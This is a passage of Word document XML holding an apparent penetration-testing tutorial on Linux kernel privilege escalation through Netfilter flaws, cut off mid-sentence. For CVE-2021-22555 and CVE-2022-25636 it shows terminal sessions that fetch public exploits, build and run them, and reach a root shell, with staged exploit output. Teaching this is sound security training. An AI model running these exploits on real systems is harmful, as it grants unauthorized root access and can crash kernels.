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E1E4" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netfilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5BF91" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="768E381F">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F31269" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netfilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Linux kernel module that provides, among other things, packet filtering, network address translation, and other tools relevant to firewalls. It controls and regulates network traffic by manipulating individual packets based on their characteristics and rules. </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netfilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also called the software layer in the Linux kernel. When network packets are received and sent, it initiates the execution of other modules such as packet filters. These modules can then intercept and manipulate packets. This includes the programs like </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>arptables</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which serve as action mechanisms of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netfilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> hook system of the IPv4 and IPv6 protocol stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F164632" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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This kernel module has three main functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248FD657" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="003341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Packet defragmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E89D8" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="003341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Connection tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579AECD3" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="003341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Network address translation (NAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C2DD2" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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 xml:space="preserve">When the module is activated, all IP packets are checked by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Netfilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> before they are forwarded to the target application of the own or remote system. In 2021 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00334102">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CVE-2021-22555</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>), 2022 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00334102">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CVE-2022-1015</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>), and also in 2023 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00334102">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CVE-2023-32233</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>), several vulnerabilities were found that could lead to privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF6C2F4" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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Many companies have preconfigured Linux distributions adapted to their software applications or vice versa. This gives the developers and administrators, metaphorically speaking, a "dynamic basis" that is difficult to replace. This would require either adapting the system to the software application or adapting the application to the newer system. Depending on the size and complexity of the application, this can take a great deal of time and effort. This is often why so many companies run older and not updated Linux distributions in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A1F99C" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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Even if the company uses virtual machines or containers like Docker, these are built on a specific kernel. The idea of isolating the software application from the existing host system is a good step, but there are many ways to break out of such a container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F1AFE4" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE-2021-22555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5659E" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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Vulnerable kernel versions: 2.6 - 5.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348232E" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">CVE-2021-22555 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A922C"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cry0l1t3@ubuntu:~$ uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46468291"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A0BD3B0"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5.10.5-051005-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C4C6B3" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">CVE-2021-22555 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6207B0F8"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cry0l1t3@ubuntu:~$ wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D022B"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cry0l1t3@ubuntu:~$ gcc -m32 -static exploit.c -o exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE910EC"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cry0l1t3@ubuntu:~$ ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B1DC1"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5F13DCA"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lastRenderedPageBreak/>
        <w:t>[+] Linux Privilege Escalation by theflow@ - 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DC75EE"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EA4F591"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STAGE 0: Initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D87CE"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Setting up namespace sandbox...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FFB24B"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Initializing sockets and message queues...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2167B386"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25EF213"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STAGE 1: Memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7986F0"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Spraying primary messages...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A7C54"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Spraying secondary messages...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C085DF"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Creating holes in primary messages...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC904F"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Triggering out-of-bounds write...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E98E771"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Searching for corrupted primary message...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF38B22"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fake_idx: fff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2D49DB"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real_idx: fdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40771A5E"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43B70C0"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...SNIP...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67613F1A"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8BEC1FB"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root@ubuntu:/home/cry0l1t3# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924857C"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921D4F1"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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2F4CB" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE-2022-25636</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A60862" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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 xml:space="preserve">A recent vulnerability is </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00334102">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CVE-2022-25636</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and affects Linux kernel 5.4 through 5.6.10. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>net/netfilter/nf_dup_netdev.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can grant root privileges to local users due to heap out-of-bounds write. </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Nick Gregory</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrote a very detailed </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00334102">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> about how he discovered this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C5C03" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">CVE-2022-25636 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582B2B5"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cry0l1t3@ubuntu:~$ uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120EBEDF"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ABD20D1"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5.13.0-051300-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0C76C" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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However, we need to be careful with this exploit as it can corrupt the kernel, and a reboot will be required to reaccess the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F3760" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="00334102">
      <w:pPr>
        <w:spacing w:after="0"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 xml:space="preserve">CVE-2022-25636 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC401C"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cry0l1t3@ubuntu:~$ git clone https://github.com/Bonfee/CVE-2022-25636.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC42AAC"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cry0l1t3@ubuntu:~$ cd CVE-2022-25636</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5BA4F"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cry0l1t3@ubuntu:~$ make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E960E3"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cry0l1t3@ubuntu:~$ ./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36A56E"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E7532F2"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STEP 1: Leak child and parent net_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31303A6B"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parent net_device ptr: 0xffff991285dc0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DDFCF"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child  net_device ptr: 0xffff99128e5a9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFBFDF"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930A646"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STEP 2: Spray kmalloc-192, overwrite msg_msg.security ptr and free net_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67CA96"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net_device struct freed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD39955"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2AE3E9A"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STEP 3: Spray kmalloc-4k using setxattr + FUSE to realloc net_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A462EC"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obtained net_device struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73F4C9"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D82C94A"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STEP 4: Leak kaslr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7108E8"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kaslr leak: 0xffffffff823093c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F6AC5"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kaslr base: 0xffffffff80ffefa0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FF424"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925C41E"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STEP 5: Release setxattrs, free net_device, and realloc it again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1B832"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lastRenderedPageBreak/>
        <w:t>[+] obtained net_device struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46643566"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D615EBA"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STEP 6: rop :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BC2C9"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5EC8239"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C7915"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9CDF331"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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF79377" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CVE-2023-32233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E10EF3" w14:textId="77777777" w:rsidR="00334102" w:rsidRPr="00334102" w:rsidRDefault="00334102" w:rsidP="0033410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 xml:space="preserve">This vulnerability exploits the so called </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>anonymous sets</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nf_tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Use-After-Free</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability in the Linux Kernel up to version </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>6.3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. These </w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nf_tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> are temprorary workspaces for processing batch requests and once the processing is done, these anonymous sets are supposed to be cleared out (</w:t>
      </w:r>
      <w:r w:rsidRPr="00334102">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
